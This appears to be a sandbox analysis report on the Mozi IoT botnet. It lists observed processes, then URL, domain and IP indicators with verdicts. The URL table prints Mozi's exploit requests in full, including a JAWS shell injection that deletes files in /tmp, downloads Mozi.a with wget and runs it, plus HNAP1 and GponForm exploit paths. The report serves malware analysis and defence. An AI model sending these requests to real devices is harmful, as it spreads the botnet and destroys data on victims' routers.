/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean

URLs

Name
IP
Malicious
http://%s:%d/bin.sh;chmod
unknown
malicious
http://13.109.201.46:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
13.109.201.46
malicious
http://112.125.239.197:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
112.125.239.197
malicious
http://3.22.17.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
3.22.17.236
malicious
http://46.249.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
46.249.83.253
malicious
http://154.3.84.96:80/HNAP1/
154.3.84.96
malicious
http://210.190.146.92:80/HNAP1/
210.190.146.92
malicious
http://%s:%d/bin.sh
unknown
malicious
http://123.110.194.55:80/HNAP1/
123.110.194.55
malicious
http://185.36.171.129:80/HNAP1/
185.36.171.129
malicious
http://89.129.183.215:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
89.129.183.215
malicious
http://49.44.132.19:80/HNAP1/
49.44.132.19
malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
77.182.10.124
malicious
http://45.148.37.237:80/HNAP1/
45.148.37.237
malicious
http://184.86.117.97:80/HNAP1/
184.86.117.97
malicious
http://166.88.13.234:80/HNAP1/
166.88.13.234
malicious
http://127.0.0.1:8080/GponForm/diag_Form?images/
164.132.95.120
malicious
http://104.124.230.135:80/HNAP1/
104.124.230.135
malicious
http://81.196.113.75:80/HNAP1/
81.196.113.75
malicious
http://204.232.228.51:80/HNAP1/
204.232.228.51
malicious
http://1.34.1.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
1.34.1.251
malicious
http://188.106.17.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
188.106.17.156
malicious
http://147.46.176.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
147.46.176.166
malicious
http://179.40.62.87:80/HNAP1/
179.40.62.87
malicious
http://pastebin.ca)
unknown
clean
http://%s:%d/Mozi.a;chmod
unknown
clean
http://%s:%d/Mozi.m;$
unknown
clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
clean
http://www.pastebin.ca/upload.php
unknown
clean
http://%s:%d/Mozi.m
unknown
clean
http://www.alsa-project.org/cardinfo-db/
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
clean
http://114.204.63.176:49152/soap.cgi?service=WANIPConn1
114.204.63.176
clean
http://www.alsa-project.org/alsa-info.sh
unknown
clean
http://%s:%d/Mozi.m;
unknown
clean
http://%s:%d/Mozi.a;sh$
unknown
clean
http://www.pastebin.ca.
unknown
clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
clean
http://127.0.0.1
unknown
clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
clean
http://www.alsa-project.org
unknown
clean
http://127.0.0.1sendcmd
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
clean
http://ipinfo.io/ip
unknown
clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
clean
http://www.pastebin.ca
unknown
clean
http://purenetworks.com/HNAP1/
unknown
clean
http://www.alsa-project.org.
unknown
clean
http://HTTP/1.1
unknown
clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
clean

Domains

| Name | IP | Malicious |
|---|---|---|
| dht.transmissionbt.com | 87.98.162.88 | clean |
| bttracker.acc.umu.se | 130.239.18.159 | clean |
| router.bittorrent.com | 67.215.246.10 | clean |
| router.utorrent.com | 82.221.103.244 | clean |
| bttracker.debian.org | unknown | clean |

IPs
